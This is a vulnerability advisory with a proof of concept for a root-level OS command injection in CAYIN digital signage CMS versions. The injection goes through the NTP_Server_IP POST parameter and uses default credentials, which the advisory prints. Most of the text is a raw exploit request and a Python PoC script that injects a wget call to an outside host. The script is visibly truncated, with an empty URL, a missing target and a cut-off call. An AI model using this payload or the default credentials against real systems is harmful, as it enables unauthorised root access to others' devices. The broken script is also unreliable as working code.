Cayin Content Management Server 11.0 Root Remote Command Injection  
Vendor: CAYIN Technology Co., Ltd.  
Product web page:  
Affected version: CMS-SE v11.0 Build 19179  
CMS-SE v11.0 Build 19025  
CMS-SE v11.0 Build 18325  
CMS Station (CMS-SE-LXC)  
CMS-60 v11.0 Build 19025  
CMS-40 v9.0 Build 14197  
CMS-40 v9.0 Build 14099  
CMS-40 v9.0 Build 14093  
CMS-20 v9.0 Build 14197  
CMS-20 v9.0 Build 14092  
CMS v8.2 Build 12199  
CMS v8.0 Build 11175  
CMS v7.5 Build 11175  
Summary: CAYIN Technology provides Digital Signage  
solutions, including media players, servers, and  
software designed for the DOOH (Digital Out-of-home)  
networks. We develop industrial-grade digital signage  
appliances and tailored services so you don't have  
to do the hard work.  
Desc: CAYIN CMS suffers from an authenticated OS  
semi-blind command injection vulnerability using  
default credentials. This can be exploited to inject  
and execute arbitrary shell commands as the root  
user through the 'NTP_Server_IP' HTTP POST parameter  
in system.cgi page.  
Tested on: Apache/1.3.42 (Unix)  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2020-5570  
Advisory URL:  
Session created with default credentials (webadmin:bctvadmin).  
HTTP POST Request:  
POST /cgi-bin/system.cgi HTTP/1.1  
Content-Length: 201  
Pragma: no-cache  
Cache-Control: no-cache  
Upgrade-Insecure-Requests: 1  
User-Agent: Smith  
Content-Type: application/x-www-form-urlencoded  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: cy_lang=ZH_TW; cy_us=67176fd7d3d05812008; cy_en=c8bef8607e54c99059cc6a36da982f9c009; WEB_STR_RC_MGR=RC_MGR_WEB_PLAYLIST; WEB_STR_SYSTEM=SYSTEM_SETTING; cy_cgi_tp=1591206269_15957  
Connection: close  
save_system: 1  
system_date: 2020/5/16 06:36:48  
NTP_Service: 1  
NTP_Server_IP: $(wget -q -U 'MyVoiceIsMyPassportVerifyMe'  
TEST_NTP: 測試  
reboot1: 1  
reboot_sel1: 4  
reboot_sel2: 1  
reboot_sel3: 1  
font_list: ZH_TW  
Request recorder @ ZSL:  
Origin of HTTP request:  
HTTP GET request to  
GET / HTTP/1.0  
User-Agent: MyVoiceIsMyPassportVerifyMe  
Accept: */*  
Connection: Keep-Alive  
PoC script:  
import requests  
url = ""  
cookies = {"cy_lang": "ZH_TW",  
"cy_us": "67176fd7d3d05812008",  
"cy_en": "c8bef8607e54c99059cc6a36da982f9c009",  
"cy_cgi_tp": "1591206269_15957"}  
headers = {"Cache-Control": "max-age=0",  
"Origin": "",  
"Content-Type": "application/x-www-form-urlencoded",  
"User-Agent": "Smith",  
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",  
"Referer": "",  
"Accept-Encoding": "gzip, deflate",  
"Accept-Language": "en-US,en;q=0.9",  
"Connection": "close"}  
data = {"save_system": "1",  
"system_date": "2020/5/16 06:36:48",  
"TIMEZONE": "49",  
"NTP_Service": "1",  
"NTP_Server_IP": "$(wget -q -U 'MyVoiceIsMyPassportVerifyMe'", # `cmd` or &cmd&  
"TEST_NTP": "\xe6\xb8\xac\xe8\xa9\xa6",  
"reboot1": "1",  
"reboot_sel1": "4",  
"reboot_sel2": "1",  
"reboot_sel3": "1",  
"font_list": "ZH_TW"}, headers=headers, cookies=cookies, data=data)